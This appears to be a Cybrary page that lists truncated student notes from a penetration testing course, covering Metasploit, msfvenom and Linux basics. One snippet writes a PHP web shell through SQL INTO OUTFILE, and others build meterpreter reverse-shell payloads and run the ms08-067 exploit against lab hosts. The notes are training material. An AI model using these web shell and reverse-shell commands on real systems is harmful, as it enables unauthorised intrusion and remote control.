Advanced Penetration Testing Notes

Mod V

Chapter 1   PEN TESTInformation gathering   [view]

By: Pawan Kumar Singh | Related Lesson: Information Gathering Intro (part 1) | Modified: October 17, 2017

Exploitation Sql

Exploitation Sql >>ip address/localhost SQL select ”<?php> system($_GET[’cmd’]); ?>” into outfile C:\\xampp\\htdocs\\shell.php”   go >> New page:  192.168.1.76/shell.php?cmd=net user james georgia [view]

By: Oishi | Related Lesson: Exploitation (part 2) SQL Commands | Modified: October 17, 2017

Mod IV

Chapter 6 cd /user/share/metasploite -framework/ #ls #cd /root # msfvenom -h # help #msfvenom -p windows/meterpreter/reverse_tcp -o #msfvenom -p windows/meterpreter/reverse_tcp LHOST-192.168.1.73 LPORT=1234-f exe > meterpreter.exe -f is format fil [view]

By: Pawan Kumar Singh | Related Lesson: Metasploit (part 6) msfvenom | Modified: October 17, 2017

Mod IV

Chapter 5 msfcli -h #msfcli exploit/windows/smb/ms08-067_netapi P #msfcli exploit/windows/smb/ms08-067_netapi ayload-windows/shell/reverse_tcp 0 #msfcli exploit/windows/smb/ms08-067_netapi ayload-windows/shell/reverse_tcp RHOST=192.168.1.72 LHOST=192 [view]

By: Pawan Kumar Singh | Related Lesson: Metasploit (part 5) msfcli | Modified: October 17, 2017

Mod IV

Chapter 4 msf exploit{  }>show options >use auxiliary/scanner/smb/pipe_auditor >set RHOST 192.168.1.72 >exploit > [view]

By: Pawan Kumar Singh | Related Lesson: Metasploit (part 4) Auxiliary Module | Modified: October 17, 2017

Mod IV

Chapter 3 #msfupdate msfconsole service postgresql start msfconsole msf>help list of command help route metasplot.com for example >search ms17-010 wannacry ransomware >info >ser RHOST 192.168.1.72 (target host) >show options >set RP [view]

By: Pawan Kumar Singh | Related Lesson: Metasploit (part 3) Operation | Modified: October 17, 2017

MOD IV

Chaptor 2.   cd usr/share/metasploit -framwork cd modules ls cd expolites cd windows ls cd smb ls cat ms xxxxxxx – files exploite-db.com for database exploites   [view]

By: Pawan Kumar Singh | Related Lesson: Metasploit (part 2) Fundamentals | Modified: October 17, 2017

Linux part 4

ls -l list the directory chmod (0 -7 for permissions)chmod +x myfile exceute for everyone using myfile cat myfile | grep B will grep anything with a B cat myfile | grep B | cut -d ” ” -f 2 > myfile2 will put those results in myfile sta [view]

By: pmalloy453 | Related Lesson: Linux (part 4) chmod, manipulation and packages | Modified: October 16, 2017

linux commands part 3

cd /home/georgia ls touch myfile created text file mkdir mydirectory cd mydirectory/ cp /home/georgia/myfile /home/georgia/mydirectory myfile  created a copy of myfile rm myfile2 echo hi georogia prints it out on screen echo hi georgia >myfile ca [view]

By: pmalloy453 | Related Lesson: Linux (part 3) - Directories, myfile and Nano | Modified: October 16, 2017

Linux Notes part 2

kali linux uses root which is unusal because it’s so powerful pwd print directory man pwd man pages man -ls listing the man directory ls / to the root ls -a / hidden directories ls -l / long format cd / change directory cd /root cd .. parent (r [view]

By: pmalloy453 | Related Lesson: Linux (part 2) Kali Linux Commands | Modified: October 16, 2017

« First ‹ Previous 1 67 75 76 77 78 79 87 177 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel